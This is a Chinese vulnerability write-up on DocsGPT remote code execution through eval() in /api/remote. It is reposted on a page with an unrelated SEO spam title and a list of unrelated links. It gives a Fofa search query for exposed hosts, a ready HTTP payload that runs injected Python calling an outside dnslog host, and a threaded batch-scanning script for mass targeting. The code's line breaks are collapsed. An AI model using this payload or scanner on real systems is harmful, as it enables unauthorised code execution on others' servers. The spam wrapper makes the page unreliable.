当前位置: 首页 > wzjs >正文

陕西做网站的网络营销师是做什么的

陕西做网站的,网络营销师是做什么的,做自己的网站给人的启发,网站分成推广怎么做免责申明: 本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们…

免责申明:

本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。

前言:

我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。

更多详情:

https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X

0x01 产品描述:

        DocsGPT是一款基于大语言模型的开源文档智能问答工具,通过整合GPT系列模型(如GPT-3.5、Falcon和Llama2优化版本)Meta的Faiss相似性搜索库及LangChain框架,支持用户以自然语言对话形式快速查询TXT/PDF/MD/RST/ZIP等多格式文档内容。该系统提供网页端、本地化部署和Chrome插件三种使用方式,允许企业私有化部署知识库并实现离线问答服务,尤其适用于技术文档管理、智能客服等场景,其开源特性还支持用户自定义模型和提示词模板以增强安全性与灵活性。
0x02 漏洞描述:

        DocsGPT 中存在导致远程代码执行 (RCE) 的漏洞。由于使用 eval() 对 JSON 数据进行解析不当,未经授权的攻击者可发送任意 Python 代码以通过 /api/remote 端点执行。 

0x03 影响版本:

0.8.1 <DocsGPT< 0.12.0
0x04 搜索语句:

Fofa:body="Welcome to DocsGPT"


0x05 漏洞复现:

POST /api/remote HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 232user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://111.9io46y.dnslog.cn/')}#":11}

这里dns地址可以替换为远程任意可执行代码

 

0x06 批量检测脚本:

批量检测:
python poc.py -f url.txt -p payload
单个检测:
python poc.py -u your-ip -p payload
import argparse
import requests
from urllib.parse import quote, urlparse, urlunparse
from concurrent.futures import ThreadPoolExecutorrequests.packages.urllib3.disable_warnings()def normalize_url(raw_url):if not raw_url.startswith(('http://', 'https://')):raw_url = f'http://{raw_url}'parsed = urlparse(raw_url)return urlunparse((parsed.scheme,parsed.netloc,'/api/remote','', '', ''))def build_form_data(dnslog_url):payload_json = ('{{"source":"reddit",''"client_id":"1111",''"client_secret":1111,''"user_agent":"111",''"search_queries":[""],''"number_posts":10,''"rce\\\\":__import__(\\\'requests\\\').get(\\\'{dns}\\\')}}#":1}}').format(dns=dnslog_url)return f'user=1&source=reddit&name=other&data={quote(payload_json)}'def check_vulnerability(target, form_data, timeout=15, debug=False):try:final_url = normalize_url(target)headers = {"Host": urlparse(final_url).netloc,"Content-Type": "application/x-www-form-urlencoded"}if debug:print(f"\n[DEBUG] 完整请求URL: {final_url}")print(f"[DEBUG] 请求头: {headers}")print(f"[DEBUG] 请求体原始数据:\n{form_data}")response = requests.post(final_url,headers=headers,data=form_data,timeout=timeout,verify=False)if debug:print(f"[DEBUG] 响应状态码: {response.status_code}")print(f"[DEBUG] 响应体前200字符:\n{response.text[:200]}")return response.status_code == 200 and '"status":"ok"' in response.text.replace(' ', '')except Exception as e:if debug:print(f"[DEBUG] 异常信息: {str(e)}")return Falsedef main():parser = argparse.ArgumentParser(description="DocsGPT远程命令执行检测工具")group = parser.add_mutually_exclusive_group(required=True)group.add_argument("-u", "--url", help="单个检测目标")group.add_argument("-f", "--file", help="批量检测文件路径")parser.add_argument("-p", "--payload", required=True, help="DNSLog监控地址")parser.add_argument("-t", "--timeout", type=int, default=15, help="请求超时时间(秒)")parser.add_argument("--debug", action="store_true", help="启用调试模式")args = parser.parse_args()form_data = build_form_data(args.payload.strip())# 处理目标列表targets = []if args.url:targets.append(args.url)elif args.file:with open(args.file, 'r') as f:targets = [line.strip() for line in f if line.strip()]print(f"[*] 开始扫描 {len(targets)} 个目标")with ThreadPoolExecutor(max_workers=20) as executor:for target in targets:executor.submit(lambda t: print(f"\033[1;32m[+] 漏洞确认: {t}\033[0m" if check_vulnerability(t, form_data, args.timeout, args.debug) else f"[-] 目标安全: {t}"),target)if __name__ == "__main__":main()

 


0x07 修复建议:

尽快升级至安全版本

http://www.dtcms.com/wzjs/372748.html

相关文章:

  • 巴彦淖尔市百家姓网站建设网站查询域名解析
  • 网站建设淘宝好评西安seo排名收费
  • 学生自做网站优秀作品河北网站建设制作
  • 网站建设的发展历史与新方向域名
  • 尼高网站设计公司品牌策划书案例
  • 外包网站都有哪些百度云盘
  • 要加强县门户网站的建设管理办法郴州网站建设
  • 网站建设基本步骤顺序怎样在百度上发布广告
  • 夫妻之间的直播seo网络推广报价
  • 网站优化定做企业管理咨询培训
  • 句容住房和城乡建设局网站成品人和精品人的区别在哪
  • 哈尔滨网站建设步骤哈尔滨百度网络推广
  • 单页网站推广网页在线客服免费版
  • 做淘宝客如何引出图片到网站海南seo代理加盟供应商
  • 网站目录程序怎样在平台上发布信息推广
  • 丰台做网站公司如何做网络营销推广
  • 扶贫工作网站怎么做seo岗位工资
  • 动漫设计和动画设计西安seo网站推广优化
  • 政府网站开发的建议发布广告的平台免费
  • 网站免费做软件有哪些竞价被恶意点击怎么办
  • 建筑设计前景怎么样重庆seo公司怎么样
  • 企业网站建设报价单免费发布推广信息的平台
  • 如何免费做网站并发布人工智能培训机构排名
  • 做彩票网站要多少钱济南网站制作
  • 网站改版换域名dw如何制作网页
  • 天猫网站建设的理由深圳网络公司推广平台
  • 广西网站运营最好的公司推广哪个网站好
  • 宝塔系统怎么建设网站app拉新怎么做
  • 我的网站模板网络公司推广公司
  • 做动态网站怎么配置系统dsn关键词优化是什么